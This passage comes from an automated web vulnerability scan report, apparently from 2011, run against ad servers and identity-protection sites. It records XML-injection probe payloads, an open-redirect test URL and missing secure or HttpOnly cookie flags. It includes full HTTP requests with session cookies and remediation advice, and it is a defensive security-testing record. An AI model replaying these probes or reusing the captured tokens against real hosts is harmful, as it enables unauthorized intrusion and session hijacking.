<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adserver/www]]>>/delivery/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1 Host: delivery.ctasnet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sun, 24 Apr 2011 12:10:33 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adserver/www/delivery]]>>/tjs.php?trackerid=276&append=1&r=96277 HTTP/1.1 Host: delivery.ctasnet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sun, 24 Apr 2011 12:10:40 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adserver/www/delivery/tjs.php]]>>?trackerid=276&append=1&r=96277 HTTP/1.1 Host: delivery.ctasnet.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=2182862;type=websi010;cat=homep146;ord=1;num=8709666307549.924? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.0 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sun, 24 Apr 2011 12:10:45 GMT Server: lighttpd/1.4.26 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <SCRIPT LANGUAGE="JavaScript"> function showcheckbox() { if(document.getElementByI ...[SNIP]... search").style.border="0px";
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
HTTP/1.1 404 Not Found Server: nginx Date: Sun, 24 Apr 2011 12:45:28 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive Vary: Accept-Encoding Set-Cookie: lc=en; Path=/ Content-Language: en Content-Length: 3614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Online dating ...[SNIP]... <a href="/sitemap.xml">XML Site Map</a> ...[SNIP]...
10. SSL cookie without secure flag setpreviousnext There are 13 instances of this issue:
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&utm_medium=affiliates&hid=205557652&campid=14&c1=394717213CD1&c2=CD1&cenhp1=1 HTTP/1.1 Host: secure.identityguard.com Connection: keep-alive Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CoreID6=87049420402113036145977&ci=90226925; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; __utmb=242046173.7.10.1303614598; 90226925_clogin=l=1303614597&v=1&e=1303615916987
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /portal/login HTTP/1.1 Host: secure.lifelock.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=182152376.1303613800.1.1.utmgclid=CNG9kumTtKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=182152376.1080477552.1303613800.1303613800.1303613800.1; __utmc=182152376; __utmb=182152376.1.10.1303613800; LifeLockEnrollment=promoCode=GOOGSEARCH13; LIFELOCK_PERSISTENT=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99; LIFELOCK_SESSION=Sun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_99%3DSun%2C%2024%20Apr%202011%2002%3A56%3A42%20GMT_22; 480-PV=3114#4/24/2011/2/56/45; C3UID=13014572191303613803; 480-CT=3114#4/24/2011/2/56/45
<!DOCTYPE html PUBLIC "-//W3C//DTD html 4.0 Transitional//EN" > <html> <head> <title>LifeLock Member Portal | Sign In</title> <link href="../styles/login.css" rel="stylesheet" type="text/css" med ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /idfide01/?promoCodeRefIde=NXTIDF01IDEFT&promoCodeRefIdf=NXTIDF01IDFFT15 HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /suzeidprotector/?promoRefCode=NXDIRSUZIDPANN HTTP/1.1 Host: www.trustedid.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Identity Theft Protection from Suze Orman</title> <meta content= ...[SNIP]...
11. Session token in URLpreviousnext There are 3 instances of this issue:
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
The value of the adurl request parameter is used to perform an HTTP redirect. The payload http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 was submitted in the adurl parameter. This caused a redirection to the following URL:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
Request
GET /pagead/aclk?sa=L&ai=BKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE&num=1&client=ca-pub-6888065668292638&val=ChAyMmZiYTMwMDE2MDEwMDhkEJSfre0EGghI3SWftmaJ_yABKAE&sig=AGiWqtzICqiMDTo80UkKP6AzOKgkaHuSwA&adurl=http%3a//a2e8cc29eb5c3fdf9/a%3fhttp%3a//clk.atdmt.com/go/253732016/direct%3bai.194941096%3bct.1/01 HTTP/1.1 Host: www.googleadservices.com Proxy-Connection: keep-alive Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ads/ads.js?uid=ZC45X9Axu6NOUFfX_289668 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=5E86DC9CC3BD60FE3A06221325A71F08; Path=/ ETag: "0-gzip" Cache-Control: must-revalidate, max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" Content-Type: text/javascript;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 24 Apr 2011 12:29:25 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=g7dpq2uc614mccbr73j7na1id6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rd/r.php?sid=13&pub=300009&c1=id4%20106163471CD1&c2=CD1 HTTP/1.1 Host: affiliate.idgtracker.com Proxy-Connection: keep-alive Referer: http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /event.flow?eventcode=000_000_15&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=0%2C0&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&iframed=1 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888; JSESSIONID=4D2F096A244DBA369FB4DA24E6E71E58
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /image.aspx?sitename=www.securepaynet.net&server=M1PWCORPWEB197&privatelabelid=471557&isc=kro_2011&status=200&rand=0.296151316862624&page=%2fdefault.aspx&referrer=http%3a%2f%2fkroogy.com%2fpub%2fbanner_728_90_random.php&ci=1767&split=30&querystring=isc%3dkro_2011%26ci%3d1767%26prog_id%3dindextonet&prog_id=indextonet HTTP/1.1 Host: img.securepaynet.net Proxy-Connection: keep-alive Referer: http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adc471557=US; flag471557=cflag=us; currency471557=potableSourceStr=USD; currencypopin471557=cdisplaypopin=false; SplitValue471557=30; traffic=cookies=1&referrer=http://kroogy.com/pub/banner_728_90_random.php&sitename=www.securepaynet.net&page=/default.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=isc=kro_2011&ci=1767&prog_id=indextonet&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: image/gif Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; path=/ Set-Cookie: pagecount=1; domain=.securepaynet.net; path=/ Set-Cookie: fb_pagecount=1; path=/ Set-Cookie: actioncount=; domain=.securepaynet.net; path=/ Set-Cookie: fb_actioncount=; path=/ Set-Cookie: app_pathway=; domain=.securepaynet.net; path=/ Set-Cookie: fb_session=S_TOUCH=04/24/2011 12:42:14&pathway=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b&V_DATE=04/24/2011 05:42:14; path=/ Set-Cookie: isc=kro_2011; domain=.securepaynet.net; path=/ Set-Cookie: visitor=vid=8d1d9a4e-c4c3-4096-bab3-4e0c6b2f6a3b; domain=.securepaynet.net; expires=Mon, 23-Apr-2012 12:42:14 GMT; path=/ Set-Cookie: traffic=; domain=.securepaynet.net; path=/ X-Powered-By: ASP.NET P3P: CP=IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA Date: Sun, 24 Apr 2011 12:42:13 GMT Content-Length: 43
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
